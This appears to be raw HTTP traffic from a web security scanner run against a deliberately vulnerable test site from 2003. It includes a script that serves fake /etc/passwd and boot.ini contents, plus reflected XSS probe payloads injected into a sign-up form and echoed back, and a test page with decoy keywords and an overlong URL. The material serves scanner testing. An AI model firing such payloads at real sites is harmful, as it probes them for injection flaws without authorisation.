elseif lcase(sName)="/etc/passwd" then
Response.Write "root:x:0:0::/root:/bin/sh"
Response.Write "dsmith:x:516:522::/home/dsmith:/bin/false"
Response.Write "etaylor:x:517:523::/home/etaylor:/bin/false"
Response.Write "scooby:x:518:524::/home/scooby-doo:/bin/false"
Response.Write "pshaggy:x:519:526::/home/pshaggy:/bin/false"
Response.Write "dtomson:x:520:527::/home/dtomson:/bin/false"
Response.Write "jsmith:x:521:528::/home/jsmith:/bin/false"
elseif lcase(sName)="/boot.ini" then
Response.Write "[boot loader]"
Response.Write "timeout=30"
Response.Write "default=multi(0)disk(0)rdisk(0)partition(3)\WINNT"
Response.Write "[operating systems]"
Response.Write "multi(0)disk(0)rdisk(0)partition(3)\WINNT=""Microsoft Windows 2000 Server"" /fastdetect"
Response.Write "multi(0)disk(0)rdisk(0)partition(2)\WINNT=""Microsoft Windows 2000 Professional"" /fastdetect"
elseif lcase(sName)="*" then
Response.Write "An error has occurred"
elseif lcase(sName)=";" then
Response.Write "NON-HTML ERROR"
else
Response.Write "Go away " & sName & "<br>I don't know you"
end if
%>
</body>
</html>
GET /test/cgi.zip HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:48:16 GMT
Content-Type: application/x-zip-compressed
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:06 GMT
ETag: "de9269fba9dc11:8f6"
Content-Length: 54
<html> FAKE ZIP FILE THAT SHOULD NEVER SHOW UP </html>GET /join.asp?name=&email=&surname=--><script>alert('XSS')</script>&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:42 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE="--><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /join.asp?name=&email=--><script>alert('XSS')</script>&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:42 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE="--><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /testing/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:26:04 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 74827
Content-Type: text/html
Cache-control: private
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Hidden Reference comment: should find this file /test/hidden.txt -->
<P> The first section shows how a combo box can be used to product optional
pages<BR></P>
<FORM ACTION="pcomboindex.asp" METHOD="post">
<SELECT NAME="cboPage">
<OPTION SELECTED="SELECTED" VALUE="pc1">Show Page One</OPTION>
<OPTION VALUE="pc2">Show Page Two</OPTION>
<OPTION VALUE="pc3">Show page three</OPTION>
</SELECT><BR> <INPUT TYPE="submit" VALUE="Submit"> </FORM><BR> <HR>
<P><A HREF="plink.asp?a=b&c=12">Second section is link that passes
parameters to a sub page</A><BR> <BR> <A HREF="error.html">My ERROR</A> Third
example allows the user to input values and then shows them on the following
page</P> <BR> <HR>
<P>False Keyword that should not be flagged: root:x:0:0:/root:/bin/sh <BR>
False Keyword that should not be flagged: An error has occurred <BR> <BR> <BR>
<A HREF="adcenter.cgi">Link to adcenter.cgi exploit - Should be flagged by
SmartChecker</A> <BR> <A HREF="/user/adcenter.cgi">Link to adcenter.cgi exploit
- Should not be flagged due to not having keyword present</A> <BR>
<A HREF="/test/adcenter.cgi">Link to adcenter.cgi exploit - Should be flagged
by Smartchecker(Note: No HTML present)</A> <BR> <A
HREF="/linking/index.htm">Several chained directories</A> <BR>
<A HREF="/cfmerror.html">Cold Fusion Error</A> <BR> <A
HREF="/admin/help.cgi">Help</A> <BR> <A HREF="/aspnet.aspx">ASP.NET file</A>
<A HREF="/my folder/bleh.html">space folder</A>
<A HREF='/myquote.asp?bleh=''>quote link</A>
<A HREF="/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa